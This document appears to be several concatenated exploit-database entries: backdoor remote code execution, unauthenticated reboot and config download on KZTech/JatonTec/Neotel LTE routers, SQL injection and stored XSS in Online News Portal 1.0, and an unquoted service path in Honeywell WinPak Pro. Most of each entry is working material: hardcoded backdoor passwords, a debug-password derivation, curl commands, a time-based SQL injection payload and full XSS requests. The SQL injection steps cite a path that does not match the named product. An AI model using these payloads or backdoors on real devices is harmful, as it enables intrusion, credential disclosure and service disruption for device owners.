# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device has several backdoors and hidden pages that allow remote code execution, overwriting of the bootrom and enabling debug mode. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5639 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php 03.02.2021 -- Older and newer models defer in backdoor code. By navigating to /syscmd.html or /syscmd.asp pages an attacker can authenticate and execute system commands with highest privileges. Old models (syscmd.asp) password: super1234 Newer models (syscmd.html) password: md5(WAN_MAC+version): $ curl -k https://192.168.1.1/goform/getImgVersionInfo {"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]} ... pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR"); if (*pcVar6 == 0) { pcVar6 = "6C:AD:EF:00:00:01"; } memset(acStack280,0,0x100); sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210"); ... psMd5Init(auStack112); psMd5Update(auStack112,local_10,local_c); psMd5Final(auStack112,uParm1); return; ... Another 2 backdoors exist using the websCheckCookie() and specific header strings. ... iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb); if (iVar2 != 0) { return 0xffffffff; } if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) && (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) { return 0xffffffff; ... if (iVar1 != 0) goto LAB_0047c304; LAB_0047c32c: WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1); LAB_0047c35c: __n = strlen(__s1); if (__n == 0) { snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log"); WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560); system(acStack1560); websWrite(iParm1,"invalid command!"); goto LAB_0047c3f8; } ... Bypass the backdoor password request and enable debug mode from within the web console: $('#div_check').modal('hide'); <--- syscmd.html g_password_check_alert.close(); <--- syscmd.asp

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device allows unauthenticated attackers to restart the device with an HTTP GET request to /goform/RestartDevice page. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5643 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php 03.02.2021 -- $ curl -sk https://192.168.1.1/goform/RestartDevice success $

# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection # Exploit Author: Richard Jones # Date: 2021-03-18 # Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Steps # Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php # Save request in BurpSuite # Run saved request with sqlmap -r sql.txt --- Parameter: MULTIPART name ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="name" aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="category" 1 -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="price" asd -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="qty" asd -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------15280280330873390203691218429-- ---

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: JT3500V is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the export_settings.cgi file using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5644 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php 03.02.2021 -- $ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat 8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat

# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting # Exploit Author: Richard Jones # Date: 2021-03-18 # Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load. # One POST /pos_inv/admin/addcustomer.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741 Content-Length: 661 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/customer.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="name" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="address" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="contact" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="username" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="password" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741-- # Two http://127.0.0.1/pos_inv/admin/supplier.php POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/supplier.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa # Three http://127.0.0.1/pos_inv/admin/product.php POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009 Content-Length: 844 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/product.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="name" ACER Aspire GX-781 Gaming PC <script>alert(1)</script> -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="category" 2 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="supplier" 0 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="price" 749.99 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="qty" 1000 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------11435260685310908573266876009--

# Exploit Title: Winpakpro 4.8 - 'GuardTourService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak # Software Links : https://www.security.honeywell.com/product-repository/winpak # WinPackPro # Tested Version: 4.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ WIN-PAK Guard Tour Server GuardTourService C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe Auto C:\Users\jorge.irigoyen>sc qc "GuardTourService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CtesDurSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START <DELAYED> CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WIN-PAK Guard Tour Server DEPENDENCIAS : WPDatabaseService NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.